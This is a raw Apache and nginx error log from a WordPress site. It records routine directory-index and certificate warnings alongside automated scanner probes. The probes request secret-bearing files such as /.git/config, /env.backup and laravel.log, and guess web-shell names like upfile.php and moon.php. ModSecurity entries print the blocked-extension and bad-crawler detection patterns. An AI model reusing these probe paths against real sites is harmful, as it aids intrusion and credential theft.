(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 25 18:03:31.370421 2025] [autoindex:error] [pid 2937:tid 140056215885568] [client 194.5.82.145:41788] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php [Tue Feb 25 18:03:47.664219 2025] [:error] [pid 2937:tid 140056283027200] [client 194.5.82.145:41850] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Feb 25 18:03:48.949654 2025] [autoindex:error] [pid 1152:tid 140056333383424] [client 194.5.82.145:41854] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Tue Feb 25 18:04:10.905807 2025] [:error] [pid 1152:tid 140056308205312] [client 194.5.82.145:41896] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Feb 25 18:04:34.016581 2025] [:error] [pid 1152:tid 140056249456384] [client 194.5.82.145:41938] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Tue Feb 25 18:04:53.730539 2025] [autoindex:error] [pid 2937:tid 140056299812608] [client 194.5.82.145:41978] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Tue Feb 25 18:05:48.295493 2025] [:error] [pid 2937:tid 140056232670976] [client 194.5.82.145:42066] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Feb 25 19:04:13.684708 2025] [autoindex:error] [pid 1152:tid 140056274634496] [client 38.252.239.77:44696] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 25 19:04:31.250574 2025] [autoindex:error] [pid 2937:tid 140056291419904] [client 38.252.239.77:44704] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 25 19:04:38.011122 2025] [autoindex:error] [pid 1153:tid 140056427190016] [client 38.252.239.77:44708] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 25 19:04:46.617266 2025] [autoindex:error] [pid 1153:tid 140056274634496] [client 38.252.239.77:44712] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 25 19:05:04.081405 2025] [autoindex:error] [pid 2937:tid 140056249456384] [client 38.252.239.77:44722] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 25 19:05:25.243237 2025] [autoindex:error] [pid 1156:tid 140056308205312] [client 38.252.239.77:44756] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Feb 26 02:23:41.127603 2025] [autoindex:error] [pid 1156:tid 140056207492864] [client 193.26.115.62:35472] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Feb 26 02:23:49.090331 2025] [autoindex:error] [pid 1153:tid 140056291419904] [client 193.26.115.62:35476] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Feb 26 02:23:57.436490 2025] [autoindex:error] [pid 2937:tid 140056418797312] [client 193.26.115.62:35486] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Feb 26 02:24:04.584596 2025] [autoindex:error] [pid 2937:tid 140056443975424] [client 193.26.115.62:35494] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Feb 26 02:24:14.440547 2025] [autoindex:error] [pid 2937:tid 140056266241792] [client 193.26.115.62:35500] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Feb 26 02:24:22.440093 2025] [autoindex:error] [pid 1156:tid 140056274634496] [client 193.26.115.62:35508] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Feb 26 02:30:37.275673 2025] [autoindex:error] [pid 2937:tid 140056410404608] [client 64.227.143.222:35610] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Feb 26 05:22:53.482964 2025] [autoindex:error] [pid 26448:tid 140358264456960] [client 194.163.129.207:38190] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com [Wed Feb 26 05:22:55.774901 2025] [autoindex:error] [pid 26447:tid 140358415525632] [client 194.163.129.207:38198] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com [Wed Feb 26 05:22:57.198998 2025] [autoindex:error] [pid 26445:tid 140358339991296] [client 194.163.129.207:38202] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com [Wed Feb 26 05:22:58.528987 2025] [autoindex:error] [pid 27034:tid 140358365169408] [client 194.163.129.207:38206] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com [Wed Feb 26 10:39:47.845017 2025] [authz_core:error] [pid 27034:tid 140358306420480] [client 159.89.12.166:45392] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/26 10:39:53 [error] 26310#26310: *25649 access forbidden by rule, client: 159.89.12.166, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Feb 26 12:49:05.940367 2025] [authz_core:error] [pid 10510:tid 140358306420480] [client 188.166.108.93:49704] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/26 12:49:11 [error] 26310#26310: *28859 access forbidden by rule, client: 188.166.108.93, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Feb 26 19:24:44.893727 2025] [:error] [pid 9539:tid 140358331598592] [client 47.128.155.52:58350] [client 47.128.155.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "Microsoft URL Control"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/counter5.wheredoyoucomefrom.ovh/private/counter.js"] [unique_id "Z7-wy2LfPPc9LpH4Udm_JwAAAVA"] [Wed Feb 26 19:25:42.667527 2025] [core:error] [pid 10510:tid 140358538450688] (70007)The timeout specified has expired: [client 47.128.155.52:57790] AH00574: ap_content_length_filter: apr_bucket_read() failed [Wed Feb 26 19:25:42.911294 2025] [core:error] [pid 10510:tid 140358407132928] (70007)The timeout specified has expired: [client 47.128.155.52:57794] AH00574: ap_content_length_filter: apr_bucket_read() failed [Wed Feb 26 19:25:44.466731 2025] [core:error] [pid 10510:tid 140358365169408] [client 47.128.155.52:57792] Script timed out before returning headers: index.php [Wed Feb 26 20:13:07.876011 2025] [:error] [pid 9593:tid 140358323205888] [client 193.41.206.98:60026] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Z7-8I_9IahWlqEIMJcL-AAAAAdE"] [Wed Feb 26 20:14:34.402091 2025] [:error] [pid 10510:tid 140358272849664] [client 193.41.206.98:60184] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/storage/logs/laravel.log"] [unique_id "Z7-8epGmwktMBZ5Q93VVpQAAAhc"] [Wed Feb 26 21:15:03.182816 2025] [autoindex:error] [pid 26448:tid 140358356776704] [client 157.66.54.6:33012] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Feb 26 22:17:29.480569 2025] [:error] [pid 10510:tid 140358457489152] [client 157.66.54.6:34178] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-conflg.php [Wed Feb 26 23:24:46.749406 2025] [:error] [pid 26445:tid 140358356776704] [client 193.41.206.246:35328] [client 193.41.206.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Z7_pDlVD_5TzvIqKodm74wAAAA0"] 2025/02/27 00:43:09 [error] 26309#26309: *38222 access forbidden by rule, client: 209.38.248.17, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/02/27 00:43:10 [error] 26309#26309: *38248 access forbidden by rule, client: 178.128.207.138, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/02/27 00:43:10 [error] 26310#26310: *38250 access forbidden by rule, client: 178.128.207.138, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/02/27 00:43:13 [error] 26309#26309: *38365 access forbidden by rule, client: 138.68.86.32, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/02/27 00:43:13 [error] 26310#26310: *38373 access forbidden by rule, client: 138.68.86.32, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/02/27 00:43:16 [error] 26310#26310: *38410 access forbidden by rule, client: 138.197.191.87, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Thu Feb 27 02:07:06.891769 2025] [autoindex:error] [pid 26448:tid 140358339991296] [client 64.227.143.222:38710] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Feb 27 03:13:44.161470 2025] [ssl:warn] [pid 30718:tid 139740969572224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Feb 27 03:13:44.415180 2025] [ssl:warn] [pid 30719:tid 139740969572224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Feb 27 03:13:45.094743 2025] [ssl:warn] [pid 30719:tid 139740969572224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Feb 27 03:13:50.003835 2025] [ssl:warn] [pid 30719:tid 139740969572224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Feb 27 03:13:52.309716 2025] [ssl:warn] [pid 31154:tid 140289039398784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Feb 27 03:13:52.536574 2025] [ssl:warn] [pid 31155:tid 140289039398784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Feb 27 03:13:53.637657 2025] [ssl:warn] [pid 31155:tid 140289039398784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2025/02/27 20:49:17 [error] 31274#31274: *52338 access forbidden by rule, client: 54.163.13.201, server: webmail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" [Fri Feb 28 03:06:48.570101 2025] [autoindex:error] [pid 31909:tid 140288605488896] [client 144.91.70.1:41848] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Feb 28 03:39:43.338889 2025] [ssl:warn] [pid 20946:tid 140021566744448] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Feb 28 03:39:43.620629 2025] [ssl:warn] [pid 20947:tid 140021566744448] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Feb 28 03:39:44.927733 2025] [ssl:warn] [pid 20947:tid 140021566744448] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Feb 28 03:39:49.725011 2025] [ssl:warn] [pid 20947:tid 140021566744448] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Feb 28 03:39:52.089131 2025] [ssl:warn] [pid 21408:tid 140405969000320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Feb 28 03:39:52.322399 2025] [ssl:warn] [pid 21409:tid 140405969000320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Feb 28 03:54:17.722336 2025] [autoindex:error] [pid 21426:tid 140405626595072] [client 64.227.143.222:42616] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Feb 28 06:20:43.385341 2025] [autoindex:error] [pid 21426:tid 140405668558592] [client 159.89.171.3:45108] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Feb 28 13:20:49.044406 2025] [authz_core:error] [pid 1281:tid 140405651773184] [client 165.22.235.3:39070] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/28 13:20:53 [error] 21523#21523: *65050 access forbidden by rule, client: 165.22.235.3, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/02/28 16:17:13 [error] 21523#21523: *68328 access forbidden by rule, client: 45.148.10.80, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Feb 28 16:17:45.378055 2025] [:error] [pid 21424:tid 140405551060736] [client 194.5.82.62:44294] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/plugins/hello-dolly/hello.php:69 [Fri Feb 28 16:17:45.378155 2025] [:error] [pid 21424:tid 140405551060736] [client 194.5.82.62:44294] Stack trace: [Fri Feb 28 16:17:45.378173 2025] [:error] [pid 21424:tid 140405551060736] [client 194.5.82.62:44294] #0 {main} [Fri Feb 28 16:17:45.378287 2025] [:error] [pid 21424:tid 140405551060736] [client 194.5.82.62:44294] thrown in /home/investig/public_html/wp-content/plugins/hello-dolly/hello.php on line 69 [Fri Feb 28 16:18:01.414283 2025] [autoindex:error] [pid 21704:tid 140405618202368] [client 194.5.82.62:44356] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Fri Feb 28 16:18:08.487760 2025] [autoindex:error] [pid 21704:tid 140405576238848] [client 194.5.82.62:44376] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Fri Feb 28 16:18:20.053060 2025] [autoindex:error] [pid 21704:tid 140405786253056] [client 194.5.82.62:44412] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Fri Feb 28 16:18:27.121929 2025] [autoindex:error] [pid 21704:tid 140405609809664] [client 194.5.82.62:44436] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 28 16:18:28.574836 2025] [autoindex:error] [pid 21704:tid 140405584631552] [client 194.5.82.62:44444] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Fri Feb 28 16:18:43.080724 2025] [autoindex:error] [pid 1281:tid 140405693736704] [client 194.5.82.62:44496] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Fri Feb 28 16:18:43.300180 2025] [:error] [pid 1281:tid 140405567846144] [client 194.5.82.62:44498] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Fri Feb 28 16:18:46.006411 2025] [autoindex:error] [pid 21704:tid 140405576238848] [client 194.5.82.62:44508] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Fri Feb 28 16:18:48.561948 2025] [autoindex:error] [pid 1281:tid 140405685344000] [client 194.5.82.62:44518] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Fri Feb 28 16:19:06.133465 2025] 